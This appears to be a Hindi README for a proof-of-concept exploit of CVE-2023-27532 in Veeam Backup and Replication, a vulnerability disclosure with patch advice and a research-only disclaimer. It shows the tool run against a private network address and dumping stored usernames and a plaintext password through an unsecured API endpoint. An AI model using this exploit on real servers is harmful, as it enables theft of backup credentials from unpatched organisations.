
Veeam Backup and Replication CVE-2023-27532 के लिए POC
Veeam Backup and Replication को प्रभावित करने वाले CVE-2023-27532 के लिए POC
इस कमजोरी का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
यह POC क्रेडेंशियल निकालने के लिए एक असुरक्षित API एंडपॉइंट का दुरुपयोग करता है।
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
नवीनतम संस्करण में अपडेट करें या Veeam सलाहकार के निर्देशों का पालन करके शमन करें
यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए गए मामलों को छोड़कर सिस्टम पर हमला करने के लिए उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।